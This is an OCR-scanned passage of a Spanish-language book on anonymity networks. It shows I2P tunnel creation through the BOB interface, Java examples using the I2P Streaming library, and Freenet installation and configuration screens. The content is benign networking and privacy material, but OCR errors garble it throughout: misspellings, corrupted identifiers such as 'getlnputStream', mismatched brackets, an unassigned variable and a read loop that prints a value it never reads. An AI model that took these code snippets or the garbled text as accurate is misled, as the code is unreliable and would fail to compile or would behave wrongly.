OK inbound port set 

OK tunnel starting 

DATA NICKNAME: adastra STARTING: false RUNNING: true STOPPING: false KEYS: true QUIET: false INPOR 
T: not set INHOST: localhost OUTPORT: 6000 OUTHOST: 127.0.0.1 

DATA NICKNAME: clientadastra STARTING: false RUNNING: true STOPPING: false KEYS: true QUIET: fals 
e INPORT: 500b INHOST: 127.0.0.1 OUTPORT: not_set OUTHOST: localhost 
OK Listing done 

Imogen 02.3J: Creadon de tunel de entrada con BOB. 


Con las instrucciones ensenadas en la imagen anterior se ha creado un tunel de entrada, el cual 
recibira mensajes por el puerto “5000”. Notar que en este caso la sesion de “Netcaf se ha cerrado, 
pero aun asi se puede ver que el tunel de entrada y salida aun se encuentra funcionando, tal como 
ensena el comando “list”. 











Capitulo II. I2P (Invisible Internet Projet) 


97 


Ahora todas las peticiones entrantes por el puerto “5000” seran tratadas por el tunel de entrada y 
automaticamente seran enrutadas al destino especificado. 


adastra@Galilei:-S telnet 127.0.0.1 5000 
frying 127.0.0.1... 

Connected to 127.0.0.1. 

Escape character is 

CRybrtNF6SQXCfG6tie5TFSz-bQCLLGkHe3DkJAzDTwf4hoQD0upYvI2vAIhsFewVbBDVo0gBdlGlecZQ3ZDaLvaOtaW~guUk- 

l48YkiCYFDUmL7BC53sPbtZXXaosVDBxCEYrwIaAZqB2XCkzCvYuy9UOuHon5yOywsw5SvNXRQQQ4wp73yyywFmIzhq0a7dMul 

RTXIflK-95TANvrgiew6Obniz85VBmSurTt9qHaRH7s3KYSKwOwbAVEDXJIFAQmOqVGMML2S;jGg0OK8aIrrLTCWP2MzNEfrBOj 

fTv-445-pcHRRGthIw7Zc5U-7FmlP7z0OedBfUvRFZ6cJK8FYcB5jaNwLEWd0flDsG6M37D8XI68gRnVCbngBYnjtpRMTnOL62 

TiGkl3sdzouBohuCPziYVcfZ*lRSLOMTeO0WmZS9zaOQYWOzszd6O2kWYZ-j knOrhLVkDejuPDPj g62nA0hkg812B~SRl4BvGxc 

qguPgplkI6GYP71GtRbeP2AAAA 

HTTP/1.1 400 Bad Request 

Server: nginx 

Date: Fri, 10 Jul 2015 00:05:57 GMT 
Content-Type: text/html 
Content-Length: 1245 
Connection: close 
ETag: "54d7a92f-4dd' 

X-ac: 3.fra sat 

<!D0CTYPE htral PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtmll/DTD/xh 
tmll-transitional.dtd“> 

■chtml xmlns=“http://www.w3.org/1999/xhtml"xhead profile="http://gmpg.org/xfn/ll”> 

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> 
ctitle>WordPress.com 400 Error</title> 

<style type="text/css"> 
hi { 

_ font-weight: normal; 

Imogen 02.32: Conexion al destino utilizando los tiineles I2P creados desde BOB. 


Se ha utilizado Telnet para realizar la conexion contra el puerto “5000”, posteriormente se ha 
ingresado la clave correspondiente al tunel de salida y finalmente se ha enviado una peticion HTTP 
contra el servidor web. 

Del mismo modo que se ha usado BOB para crear tuneles de entrada y salida para acceder a servicios 
en Internet, tambien es posible crear tiineles cuyo destino es un servicio oculto en la web profunda 
de I2P. 


adastra@Galilei:-$ netcat 127.0.0.1 2827 
BOB 00.00.10 
OK 

OK Nickname set to adastra-emisor 

OK fd7JgXFWP~wWxIgvweirbCh6-QKwiQ2vliq2zD6tdav3WnQL0lak86FdYNgqDKRICvLTvtN-XyjOnqKOMLFNCGvlh6JwH3Q 
z-RKwSLBlNbyhe2VTneN6vKJkKZbvoRQZs788l6xN7nkYwBg-GH3Lc41NMFnKlpHILSyKTXvbxT~P2eRcIacdYrDw0wRVMFlF6 
hE7yb56ZyIo0qp-G2jTigO6ZEcJhtXWPFHbogHA4U-OtA77P8hlO2BCrNhH7t-p2CqqcmQC5yO8oL90IeuYlCaBGTwMqHTJR44 
n3i-d5zhLaLCoN7EN87RShdjlrgKUF8kBWBhOLhpVtVWIFjZFiInDinU6UmH0zc6Y9-dQJP15beOdOvgxfr5YLcyeGC~imZ6LJ 
zkHnk3VlC-BHEjwI3FRes5TJnK0W5xb4qQ2AAl-UeO7z6bmeOzGkvu-EaRYi56OOFiI-kZ9-TsmaYDg9Y6j5J-ry3snvKc9P6x 
s8GfnivNxcLXz7sWMKc0gQatoAAAA 

OK outhost set 

OK outbound port set 

OK tunnel starting 

hi___ 

Imagen 02.33 - Tunel de salida con BOB para consultar la web profunda de I2P. 

Lo que se ensena en la imagen anterior es el mismo proceso que se ha visto anteriormente, 
simplemente se ha creado un tunel de salida utilizando los comandos disponibles en la interfaz 
de BOB. Lo siguiente es crear el tunel de entrada y finalmente, realizar una peticion contra un 
EEPSITE en la web profunda de I2P. 
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adastra@Galilei:~$ netcat 127.0.0.1 2827 
BOB 00.00.10 
OK 

OK Nickname set to adastra-receiver 

OK VcFkLNDD2ud9I-xI4lIlD3teKuUlEto4SZpUlRIVw5iyWQZQ3i9w-3eFlVHqitnklM-02hMsi5W9iP3ksj FJEIqKd3fYnGF 
rxlvvzY80n6POtybo-rnYNlaoerw~vvCCp6Xpu-xZcJoyDZMSs4HWwpnj-EibJw2Lflst6W7EsPbpaC-hK82dWK8xQLoWbZVE- 
-UcWlHuTGmLh2XUllUPhnHgNYMv7TIHJhZrwJ9gWE-]0gGOjL9mcEs7HSiXVs\/SCsntgdV8cWcyQe8YSx-TqHGEh8-izPwYSlU 
sKYEQYTn50QmEAlVHTFPbmiqtIubzBJrGqgoOQFIwSSHOppUfukcpPEz8i2M9KX8PfHYhbcMay3Wzkwell9K3cKu94VQDA6uy3 
ob~cHRCVKldcLCXz2KVebqFscAxuE4VWNhuwpW7vFmnjUJXL709R39CEV6QfIS6pFhc6~3UodensXZ71Gi-VNg4fUuMBXTGhOc 
gPKXBU3K5aRivw6HiWW63lh8lAAAA 

OK inhost set 

OK inbound port set 

OK tunnel starting 

DATA NICKNAME: adastra-emisor STARTING: false RUNNING: true STOPPING: false KEYS: true QUIET: fals 
e INPORT: not_set INHOST: localhost OUTPORT: 8000 OUTHOST: 127.0.0.1 

DATA NICKNAME: adastra-receiver STARTING: false RUNNING: true STOPPING: false KEYS: true QUIET: fc 
Ise INPORT: 6666 INHOST: 127.0.0.1 OUTPORT: not_set OUTHOST: localhost 
OK Listing done 


Imagen 02.34: Tunel de entrada con BOB para consultar la web profunda de I2P. 


Ahora que ambos tuneles se encuentran creados (entrada y salida) se pueden realizar peticiones 
contra servicios en la web profunda de I2P utilizando herramientas tan habituales como Telnet, del 
mismo modo que se ha explicado anteriormente. 


2.4.3 Streaming Library 

En I2P existen varias implementaciones y librerias que se encuentran al alcance de todos los 
desarrolladores que quieran interactuar con I2P, como se ha visto anteriormente, BOB y SAM 
son unas de esas implementaciones, sin embargo la libreria de Streaming de I2P es una de las 
mas populares debido a sus funcionalidades y enfoque. Para comprender en que momento resulta 
conveniente utilizar la libreria de Streaming de I2P es importante entender como funciona. Todas 
las aplicaciones que se ejecutan en I2P utilizan tuneles, los cuales habitualmente se gestionan con 
I2PTunnel. Este modelo resulta conveniente cuando se sigue un modelo cliente-servidor, dado 
que en dicho modelo solamente se utiliza una unica instancia de I2PTunnel para conectar a varios 
clientes con un unico servidor. 

Un ejemplo de este tipo de aplicacion son los Eepsites, servicios ocultos al interior de I2P como 
SSH, Telnet, etc. En dichos casos se debe crear un tunel cliente y/o servidor para acceder a dichos 
servicios ocultos, sin embargo, cuando se trata de aplicaciones peer-to-peer donde la comunicacion 
no se encuentra centralizada en un unico nodo sino que cualquier participante puede actuar como 
emisor o receptor en un momento dado resulta inviable utilizar I2PTunnel, ya que se necesitaria 
una nueva instancia de “servidor” por cada emisor de un mensaje. Es en esos casos en los que se 
hace necesario emplear la libreria de streaming de I2P ya que por norma general, se utiliza para 
aplicaciones punto a punto, como es el caso de descargas de torrents o similares, de hecho, un 
ejemplo bastante claro se encuentra en el proyecto “I2PSnark”, un cliente bittorrent que utiliza la 
libreria de Streaming para descargar y compartir torrents utilizando la red de I2P. El codigo fuente 
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del proyecto se encuentra licenciado con la GNU/GPL y esta disponible en el siguiente repositorio 
GitHub: https://github.com/i2p/i2p.i2p/tree/raaster/apps/i2psnark 

Esta libreria representa una implementation de una capa TCP anonima y segura, es util para la 
programacion y transmision de mensajes teniendo en cuenta el costo relativamente alto de los 
mensajes que se intercambian en un proceso de comunicacion bidireccional, de esta forma, la 
libreria permite que cada mensaje individual contenga toda la information que sea posible para que 
el receptor pueda hacer uso de ella. 

Por ejemplo una petition HTTP puede finalizar rapidamente en un solo viaje (ida y vuelta) por 
medio de esta libreria, donde una transaction HTTP es iniciada por un cliente enviando un mensaje 
con las flags SYN, FIN y el payload correspondiente, el receptor respondent automaticamente con 
un paquete incluyendo los mismos SYN, FIN recibidos, pero ademas incluyendo la flag ACK con su 
correspondiente payload de respuesta. La libreria de streaming de 12P consta de una API Java que 
contiene todos los elementos necesarios para crear conexiones de streaming por medio de I2P. Es 
necesario conocer las clases principales que permiten crear “ Destinations ” y posteriormente poder 
consultarlos por otros clientes de I2P. 

A continuation se explican los pasos necesarios para crear Destinations I2P que representaran los 
puntos de acceso para otros participantes de la red. Un destination es similar a la combination de 
una direction IP/dominio con un puerto, es decir, contiene todos los elementos necesarios para que 
entidades extemas se puedan conectar. 

1. Las clases I2PSocketManager, I2PSession y I2PSocketManagerFactory tienen los metodos 
necesarios para crear destinations. Evidentemente es necesario que I2P se encuentre levantado, 
dado que estas clases permiten acceder a una sesion I2P y crear un socket servidor, un objeto 
equivalente a una instancia de la clase ServerSocket de Java, pero con los anadidos necesarios 
para funcionar sobre I2P. 

//Crear un administrador de Sockets. 

I2PSocketManager manager = I2PSocketManagerFactory.createManager(); 

//Crear un ServerSocket I2P por medio del administrador,. 

I2PServerSocket ServerSocket = manager.getServerSocket{); 

//Utilizando el administrador se crea una Session I2P para obtener el Destina¬ 
tion en Base64 que //sera el punto de acceso de clientes que deseen conectarse 
cone ServerSocket. 

I2PSession session = manager.getSession(); 

//Para conocer el Destination asignado a la Session creada por I2P, se consul¬ 
ts el metodo 
//"getMyDestination() 

System.out.println(session.getMyDestination().toBase64()) ; 

2. Despues de crear un “ ServerSocket ” I2P, es posible obtener un destination valido para que 
los clientes puedan contactar con la aplicacion de forma anonima. En este punto, se debe seguir 
el mismo modelo de programacion de Sockets en Java, es decir, es recomendable crear un hilo 
independiente para cada uno de los clientes que contacte con la aplicacion, ya que de lo contrario 
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el socket servidor solamente podra atender a un cliente a la vez, lo que sin lugar a dudas se 
traducira en un cuello de botella. En I2P, existe la clase I2PThread que es util precisamente para 
esto, su funcionamiento es similar al de cualquier Thread en Java, se debe instanciar y establecer 
un objeto que implemente la interfaz Runnable. 

//Se crea un objeto I2PThread especificando una implementacion de la interfaz 
"Runnable" la cual //se encargara de implementar el metodo "run" del Thread. 

I2PThread client = new I2PThread(new RunnableClient(serverSocket)); 

//Se establecen algunas propiedades basicas del hilo y posteriormente se inicia 
su ejecucion 

client.setName("client") ; 
client.setDaemon(false) ; 
client.start() ; 

3. Los elementos anteriores representan la implementacion basica de un ServerSocket I2P para 
procesar las peticiones de los clientes de forma anonima. A continuacion se debe implementar 
la logica que permitira procesar cada peticion, la cual debe incluir la lecmra y escritura de los 
flujos de entrada y salida del socket, asi como cualquier otra tarea que lleve a cabo la aplicacion. 
En este caso unicamente se recibira cada peticion y se respondera con un mensaje de texto 
piano, el codigo de dicha logica se define en la clase RunnableClient, la cual se ha referenciado 
anteriormente y a continuacion se ensena su implementacion. 

//Clase encargada de iniciar un hilo por cada cliente que contacts con la apl- 
cacion. 

public class ClientHandler implements Runnable { 

//Server Socket obtenido del Manager de I2P. 
private I2PServerSocket socket; 

//Constructor que recibe como parametro el Server Socket 
public ClientHandler(I2PServerSocket socket) { 
this.socket = socket; 

} 

//Metodo encargado de ejecutar la logica necesaria para procesar cada peti¬ 
cion recibida. 

public void run() { 

//Se inicia bucle para atender las peticiones de los clientes. 
while(true) { 
try ( 

I2PSocket sock = this.socket.accept(); 
if(sock != null) { 

//Se obtiene el flujo de entrada del socket. 
BufferedReader br = new BufferedReader(new 
InputStreamReader(sock.getlnputStream())); 

//Se obtiene el flujo de salida del socket. 

BufferedWriter bw = new BufferedWriter(new 
OutputStreamWriter(sock.getOutputStream())); 

//Se lee cada una de las lineas enviadas por 

el cliente. 

String line = 

while(br.readLine() != null) { 

System.out.println(line); 
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> 


} 

II Se envia un mensaje al cliente. 

bw.write("I've got your message... bye! "); 

bw.flush () ; 

//Se cierra el socket, 
sock.close(); 

} 

} catch (I2PException ex) { 

System.out.println ("General I2P exception!''); 

} catch (ConnectException ex) ( 

System.out.println("Error connecting!"); 

) catch (SocketTimeoutException ex) { 

System.out.println("Timeout!"); 

} catch (IOException ex) { 

System.out.println("General read/write-exception!"); 

) 


Como se puede apreciar del codigo anterior, por cada petition recibida se obtiene un objeto I2PSocket, 
que es el objeto que realmente permite la comunicacion entre ambas emisor y receptor. Aunque se 
trata de un fragmento de codigo muy simple, ilustra los fondamentos de cualquier aplicacion con 
I2P y su libreria de streaming. El siguiente paso consiste en implementar el codigo necesario para 
crear un cliente I2P que pueda conectarse con un destination como el que se ha podido crear en el 
codigo anteriormente explicado. A continuation se detalla el procedimiento a seguir a la hora de 
crear sockets cliente con la libreria de streaming de I2P. 

1. Del mismo modo que sehanutilizado las clases 12PSocketManageryI2PSocketManagerFactory 
en la implementation del lado del receptor, en el caso del emisor es necesario acceder a un manager 
para obtener un objeto Socket. Sin embargo, tambien es necesario crear un objeto Destination 
que se incluye en la API Java de I2P. Dicho objeto simplemente representa la cadena de texto 
en Base64 del ServerSocket al que el cliente debe conectarse. Evidentemente es necesario que 
el receptor comunique de alguna forma su existencia a clientes potenciales y dicho mecanismo 
de entrega puede ser tan simple como enviar un correo electronico de forma anonima a los 
clientes con el Destination o registrarlo en un servicio de directorio como el de “stats.i2p”. El 
siguiente codigo se encargara de leer desde la consola la cadena de caracteres correspondientes 
al Destination del ServerSocket y posteriormente realizar una conexion. 

I2PSocketManager manager = I2PSocketManagerFactory.createManager(); 

//Se solicita e ingresa la cadena de texto correspondiente al Destination de 
I2P 

System.out.println("Please enter a Destination:"); 

BufferedReader br = new BufferedReader(new InputStreamReader(System.in)); 

String destinationstring = null; 
try { 

destinationstring = br.readLine(); 

} catch (IOException ex) { 

System.out.println("Failed to get a Destination string."); 
return; 


1 
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Destination destination = null; 
try { 

destination = new Destination(destinationstring); 

I2PSocket socket = null; 

socket = manager.connect(destination); 

} catch (I2PException ex) { 

System.out.println("General X2P exception occurred!"); 

} catch (ConnectException ex) { 

System.out.println("Failed to connect!"); 

} catch (NoRouteToHostException ex) ( 

System, out. println ("Couldn't find host!"); 

} catch (InterruptedlOException ex) { 

System.out.println("Sending/receiving was interrupted!"); 

} catch (DataFormatException ex) { 

System. out.println("Destination string incorrectly formatted."); 
return; 


2. En las llneas de codigo anteriores se lee el Destination al que se desea conectar el cliente y 
posteriormente se procede a realizar una conexion si no se ha producido ninguna excepcion. 
A continuacion se incluye el codigo necesario para que el cliente pueda comenzar a enviar 
mensajes. 


try { 

BufferedWriter bw = new BufferedWriter(new 
OutputStreamWriter(socket.getOutputStream())); 

bw.write("Hello ServerSocket!\n"); 
bw.flush() ; 

BufferedReader br2 = new BufferedReader(new 
InputStreamReader (socket.getlnputStreamO ) ) ; 

String s = null; 

while ( (s = br2.readLine()) != null) { 

System.out.println("Received from server: " + s); 

) 

//Se finaliza la comunicacion con el ServerSocket. 
socket.close(); 

) catch (IOException ex) { 

System.out.println("Error occurred while sending/receiving!"); 


} 


Este es todo el codigo necesario para comunicar dos aplicaciones utilizando la libreria de streaming 
de 12P. Evidentemente se incluyen unicamente de los elementos fundamentales para crear emisores 
y receptores, no obstante la logica que se debe implementar depende integramente de los requisitos 
funcionales de la aplicacion a desarrollar. Tal como se ha mencionado anteriormente, esta libreria es 
ideal para crear aplicaciones punto a punto, con lo cual las aplicaciones deben servir precisamente 
para cumplir con ese objetivo y en el caso de que se trate de una aplicacion con un modelo cliente/ 
servidor, es recomendable utilizar I2PTunnel e implementaciones distintas como es el caso de BOB 
oSAM. 
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Capitulo III 
FreeNET 


En este capitulo se hablara sobre el funcionamiento de la red anonima Freenet, la cual cuenta con 
una serie de caracteristicas que le convierten en una solucion muy valorada y utilizada en el campo 
de la privacidad y anonimato. 


3.1 Introduccion 

Freenet es uno de los proyectos mas conocidos y antiguos relacionados con el anonimato, sus inicios 
datan del ano 2001 y a la fecha de redactar este documento, sigue teniendo vigencia. Freenet es una 
solucion de anonimato muy avanzada, que a diferencia de otras redes anonimas se basa en un modelo 
descentralizado, no existen servidores para controlar o gestionar la red y en su lugar, cada usuario 
que se conecta a Freenet aporta un poco de ancho de banda a la red y reserva un espacio en su disco 
duro para almacenar information de otros usuarios, dicho espacio es conocido como “datastore". 
Este modelo aporta un repositorio de datos distribuido en el que la informacion almacenada en 
cada ''datastore" se encuentra cifrada y solamente el propietario de los ficheros puede descifrar sus 
contenidos utilizando su clave privada. 

Esto quiere decir que cada usuario en Freenet tiene un directorio en su ordenador en el que se 
almacenan ficheros cifrados por otros integrantes de la web profunda de Freenet y evidentemente, el 
usuario tiene escaso control sobre los contenidos que alii se almacenan. 

Freenet es una solucion altamente personalizable y se adapta a los requerimientos de cualquier 
usuario, sigue una filosofia y funcionamiento muy similar a I2P y de hecho, ambas soluciones siguen 
el mismo modelo de anonimato “ inproxy ” o limitado unicamente al contexto de una VPN sin acceso 
directo a Internet. Su principal objetivo es facilitar las comunicaciones entre dos o mas participantes 
de forma segura, privada y anonima. 

Del mismo modo que I2P, Freenet cuenta con varias caracteristicas que le hacen especialmente 
interesante a la hora de crear servicios ocultos en la web profunda ya que cuenta con una plataforma 
idonea para la ejecucion de aplicaciones para chatear, participar en foros y recibir o enviar mensajes 
de correo electronico. A diferencia de Tor, Freenet es una red descentralizada que depende en gran 
medida de la cantidad de usuarios que la utilizan ya que entre mas usuarios, sera mas dificil para 
un atacante localizar el origen de una petition determinada y en consecuencia sera mas solido su 
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anonimato. Del mismo modo que ocurre en I2P y Tor, cuando un usuario se conecta a la red, no 
solamente puede utilizar otros puntos de la red para acceder a servicios ocultos, sino que tambien un 
poco de su ancho de banda sera utilizado para transportar informacion a otros nodos, siguiendo el 
mismo mecanismo de “onion routing ” que se encuentra implementado en I2P y Tor. 

Las caracteristicas que se han mencionado anteriormente son comunes a casi todas las redes anonimas 
existentes actualmente, no obstante, Freenet tiene una amplia trayectoria y reconocimiento en el 
mundo de las tecnologias de la informacion por el papel que juega en las areas de la privacidad y 
anonimato de los usuarios, se trata de un proyecto mas antiguo que I2P y de hecho, muchas de las 
caracteristicas que destacan en I2P han sido de alguna forma “heredadas” de Freenet. 

Por otro lado, Freenet tiene un enfoque distinto que lo hace muy interesante para fortalecer el 
anonimato y es el concepto de “ Darknet ”, el cual consiste en restringir las conexiones que pueden 
realizarse solamente a aquellos nodos en la red que se consideren ‘‘‘'friends'' esto quiere decir que 
dentro de la red de Freenet, pueden existir pequenos segmentos de redes de personas que se comunican 
entre ellas y ningun otro nodo puede acceder o unirse a dichos segmentos sin permiso previo, esto 
permite que los usuarios puedan reducir las posibles vulnerabilidades o fugas de informacion en 
terminos de ataques comunes que se realizan contra el anonimato. 


3.1.1 Instalacion de Freenet 

Freenet se encuentra desarrollado en Java, con lo cual es necesario contar con una maquina virtual 
de Java para poder instalar y ejecutar una instancia de Freenet. Es compatible con multiples sistemas 
operativos gracias a la independencia de plataforma que offece la plataforma de Java y aunque es un 
proyecto que lleva varios anos activo, aun se liberan de manera bastante ffecuente nuevas versiones 
y mejoras que hacen que el software sea cada vez mas estable y robusto. 

El unico requisite para poder instalar Freenet es precisamente una maquina virtual de Java y se 
recomienda que sea de una version superior a la 6. 

A continuation se explica, paso a paso, cada una de las etapas de instalacion y configuration de 
Freenet, que como se podra apreciar, es mucho mas especifica y detallada que otras soluciones de 
anonimato. 

1. Es necesario descargar y ejecutar el instalador de Freenet, el cual es un fichero “JAR” que se 
puede lanzar directamente con Java y que ensena un asistente muy simple y que con pocos pasos 
se puede completar el proceso de instalacion. 

>wget 'https://freenetproject.org/jnlp/freenet_installer.jar' -0 new_installer_ 
offline, jar >java -jar new_installer_offl.ine . jar 

2. Despues de seleccionar el directorio en el que se deben crear todos los ficheros correspondientes 
a la instancia de Freenet, el asistente ensenara una ventana de resumen indicando todas las 
operaciones que se han llevado a cabo. 
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Imagen 03.01: Instalacion de Freenet. 


3. A continuacion se abrira un nuevo asistente en el navegador web por defecto del usuario, el 
cual abrira el sitio “http://127.0.0.1:8888/wizard/” y en dicho sitio se solicitara en primer lugar el 
nivel de seguridad que se quiere utilizar para la instalacion, habiendo 3 niveles posibles: “Bajo”, 
“Alto” y “Personalizado”. En el caso de seleccionar “Bajo”, se asume que el uso de Freenet 
es encuentra permitido en el pais donde esta el usuario y deja el nodo abierto a que cualquier 
participante en la red de pueda contactar y establecer conexiones. “Alto” indica que nadie puede 
realizar conexiones a este nodo a excepcion de los “friends", lo que permite crear “ darknets ”, 
tal como se ha explicado en parrafos anteriores. Finalmente, “Personalizado” permite establecer 
un control mas fino, permitiendo al usuario declarar sus propias politicas relacionadas con la 
privacidad. Este ultimo nivel es el aconsejado. 

4. Una vez seleccionado el modo de instalacion, la primera interfaz advierte que se debe utilizar 
un navegador distinto del que se utiliza habitualmente para navegar por sitios en la web profunda 
de Freenet. 

5. En los siguientes pasos se le permite al usuario seleccionar la option de habilitar la interfaz 
UPnP, permitir las actualizaciones de Freenet de forma automatica y definir si se desea conectar 
solamente con amigos o permitir tambien extranos, con sus correspondientes ventajas y 
desventajas. 
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Actualizacion y complementos 


Actualizar automaticamente 


Freenet puede mantenerse actualizado automaticamente. ^Quieres que lo haga?: 


• Mantener Freenet actualizado automaticamente 


Preguntar cuando una nueva versibn este disponible. 


Plugins 


Los complementos son extensiones opcionales para Freenet que lo mejoran de alguna forma. Algunos de ellos puede que tengan proWemas de 
seguridad para algunos usuarios, vea debajo. 

* Habilita Universal Plug and Play (UPnP). Establezca esto si tiene un router en su red local. No lo establezca si esta conectado directamente a su 
ISP. (ej. mediante modem telefonico), o tiene gente no confiable en su red local (ej. en algun alojamiento de estudiantes). 

Volver Proximo 


Imogen 03.02: Actualizacion y complementos de Freenet. 


6. En caso de seleccionar la opcion de solo amigos se puede seleccionar tambien el nivel 
de proteccion contra extranos “ ALTO ” o “ MAXIMO ”, en el caso de seleccionar la opcion de 
conectarse con extranos se pueden seleccionar los niveles de proteccion “ MEDIO o “BAJO 
Si es la primera vez que se utiliza Freenet, es prudente utilizar el perfil de conexion con extranos 
para poder explorar la red y sus servicios sin problemas de rendimiento, dado que para poder 
utilizar el perfil de conectarse solamente con amigos y crear una darknet es requisito contar con 
un minimo de 5 participates. 

7. Posteriormente se debe seleccionar el tipo de seguridad fisica del ordenador, de los niveles 
que aparecen en este paso del asistente se recomienda utilizar un nivel ALTO o MAXIMO. 



Ayudante de Freenet! - Configuraciones de seguridad fisica 


Proteccion si mi computadora es revisada o robada 


Que tanto te preocupa que tu computadora sea fisicamente examinada si es robada o confiscada? 

Le recomendamos firmemente que cifre su disco duro utilizando, por ejemplo, TrueCrypt . Esto proporcionara la mejor proteccidn, especialmente si ub'liza 
aplicaciones de terceros y complementos como Sone y FMS. pern puede llevar algun tiempo instalarlo. De otro modo. puede establecer una contrasena para sus 
descargas, subidas, y la memoria cache de los sitios web de Freenet visitados recientemente. 

Ademas, debe cifrar el archivo de intercambio si es posible (este es un archivo temporal utilizado por Linux para proporcionar espado adicional si se queda sin 
memoria). Te recomendamos altamente que cifres tu disco duro usando por ejemplo Truecrypt y escoje sguridad BAJO. LOW. Si no has hecho esto, escoge un 
nivel mbs alto, pero deberias desactivaro cifrar el archivo temporal (swapfile). 

BAJO: Me importa 

NORMAL: Me importa 

ALTO: Estoy muy preocupado. Cifra todos los datos importantes con una contrasefia. (Escoge esto si estas encantado de confiar en una contrasena) 

• MAXIMO: Estoy extremadamente preocupado. Cifra todo y no guardes la Have. Bona todo, mduyendo las descargas siempre que Freenet sea reiniciado. 
(Freenet no recordarS lo que has visitado antes del reinicio. por lo que tendrSs que descargar material de nuevo; esto podria hacerte un poco m&s vulnerable a 
nivel de red pero si estcis muy preocupado por una confiscacidn, escoge esta opcion). 

Deberias seguir las recomendaciones estandar de seguridad (mantener actualizado. ejecutar un antivirus, no abrir archivos en los que no confias. etc ). y ten en 
cuenta de que si "ellos” acceden a tu ordenador mientras que esta encendido y ejecutando Freenet, jningun nivel de cifrado te ayudara!. 

Volver Prdximo 


Imogen 03.03: Niveles de seguridad fisica. 
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8. El siguiente paso del asistente solicita el tamano que tendra el datastore de la instancia de 
Freenet. En este caso, entre mas espacio se comparta, mayor sera el beneficio para la red y mas 
optimo el funcionamiento del nodo. 

9. Finalmente, el ultimo paso consiste en asignar el ancho de banda que se desea dedicar para 
Freenet, se recomienda aproximadamente la mitad sobre el limite que establece el ISP del usuario. 


Limites de ancho de banda 

Limite de transferencia 

iComo de rapida es su con exion a Internet? Freenet no deberia usar mas de la mitad de ella. Puede cambiar esta configuracidn mas tarde en la pagina Ajustes 
del nucleo. Observe que 1 megabit por segundo (1 Mbps) = 128 kibibytes por segundo (128 KiB/s) 


Tipo de conexion 

Limite de descarga 

Limite de subida 

Seleccionar 

Velocidad detectada (usar la mitad) 

512 KiB/s (= 4Mbps) 

256 KiB/s 

• (Recomendado) 

4 megabits 

256 KiB/s (= 2Mbps) 

16.0 KiB/s 


6 megabits (ADSL1 media) 

384 KiB/s (= 3Mbps) 

16.0 KiB/s 


8 megabits (ADSL1 r£pido) 

512 KiB/s (= 4Mbps) 

32.0 KiB/s 


12 megabits (ADSL2 lento) 

768 KiB/s (= 6Mbps) 

64.0 KiB/s 


20 megabits (ADSL2 rapido, conexibn por cable/fibra rapida) 

1.25 MiB/s (= 10Mbps) 

64.0 KiB/s 


VDSL (20/5) 

1.25 MiB/s (= 10Mbps) 

320 KiB/s 


100 megabits (fibra) 

2.0 MiB/s (= 16Mbps) 

2*0 MiB/s 


Introducir un limite de banda ancha personalizado 


Volver Proximo 


Imogen 03.04: Seleccion de los limites de ancho de banda para uso de Freenet. 



Una vez completados estos pasos, aparecera en el navegador web la interfaz principal Fproxy, la 
cual incluye todas las opciones que se encuentran disponibles en la instancia de Freenet recien 
instalada. Tal como se vera a lo largo de este capitulo, Fproxy representa una de las herramientas 
mas importantes a la hora de acceder a los servicios ocultos que se encuentran disponibles en la 
webprofunda de Freenet. 

Cuando se accede a la interfaz principal de FProxy se pueden apreciar las siguientes opciones: 

- Browsing: Permite interactuar con la red de Freenet realizando busquedas de FreeSites, 
subir un Freesite a la red y ver directories de sitios web en la red. 

- FileSharing: Permite compartir archivos en la red. 

Friends: Cuenta con todas las herramientas necesarias para ver y agregar amigos al nodo 
actual. Ademas, como se vera mas adelante, tambien permite obtener la referencia del nodo, 
la cual debe ser entregada a los administradores de los otros nodos con los que se desea crear 
una “darknet” al interior de Freenet. 

- Discussion: Foro publico de Freenet. 

- Status: Avisos sobre eventos relacionados con el Nodo. 

- Configuration: Permite modificar opciones de configuration basicas y avanzadas en 
el nodo. Algunas de dichas opciones aun son experimentales y pueden provocar efectos 
indeseados sobre el nodo. 
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- Key Utils: Utilidades disponibles en el nodo para el tratamiento de claves. Las herramientas 
disponibles aqui son de vital importancia para realizar ciertas labores, tal como se vera mas 
adelante en este capitulo. 

3.1.2 Servicios ocultos en Freenet 

El fimcionamiento de Freenet sigue el mismo esquema que I2P, ya que ambas soluciones de 
anonimato se enfocan en la creation de una red privada que se compone de usuarios y servicios 
ocultos. Del mismo modo que I2P, Freenet es una solution “ inproxy ” que se encuentra disenada 
especfficamente para crear y consumir servicios al interior de la red, pero no permite el acceso 
directo a Internet por medio de los repetidores que la conforman como es el caso de otras soluciones 
“ outproxy ” tales como Tor. 

3.1.2.1 Servicios ocultos para comenzar a descubrir la web profunda de Freenet 

Partiendo de Fproxy es posible establecer conexiones con los servicios ocultos que se encuentran 
disponibles en la red de Freenet. Tal como se ha visto en la seccion anterior, se trata de una herramienta 
que se encuentra disponible en el puerto “8888” y se levanta automaticamente cuando se inicia la 
instancia de Freenet. Cuenta con todas las herramientas y utilidades necesarias para administer la 
instancia local y explorar la web profunda de Freenet. Algunas de dichas herramientas incluyen un 
listado de servicios ocultos recomendados en la red, un buscador para descubrir servicios ocultos, 
una seccion de marcadores para almacenar un listado de servicios ocultos interesantes y otras 
caracteristicas avanzadas que se veran a lo largo de este capitulo. Inicialmente resulta interesante 
acceder a algunos de los servicios mas conocidos en Freenet para saber que puede ofrecer a los 
usuarios. 

Nota: A diferencia de Tor o 12P, los contenidos en Freenet suelen encontrarse disponibles la mayor 
parte del tiempo gracias a la arquitectura de esta red anonima, no obstante, como se vera en los 
siguientes apartados de este capitulo, la disponibilidad de estos contenidos depende directamente de 
la cantidad de vistas que reciban y el numero de “ datastores” en los que se encuentren integrados. 
Por otro lado, en el listado de servicios ocultos que se muestra a continuation, solamente se incluye 
la clave correspondiente a dichos servicios y es necesario utilizar la herramienta “ FProxy ” para poder 
acceder a ellos y suponiendo que se encuentra en ejecucion en el puerto “8888”, que es el puerto 
por defecto, un usuario accedera a cualquier contenido ingresando “http://l 27.0.0.1:8888/<CLAVE_ 
FREENET>”. Como se ha comentado anteriormente "FProxy” es una de las herramientas mas 
importantes en Freenet y en este caso concreto, les permitira a los usuarios el acceso a claves con 
contenidos en la web profunda de Freenet. La estructura, tipologla y funcionamiento de las claves 
en Freenet se explicara detalladamente mas adelante. 

3.1.2.1.1 Servicios de busqueda y directories 


Clave freenet. 


USK@IseI-izgllc8sr~ 1 reXQJzlLNGLIY- 

voOnLWWOyagYQ,xWfr4pyOYZqAQSI-BX7bolDe- 

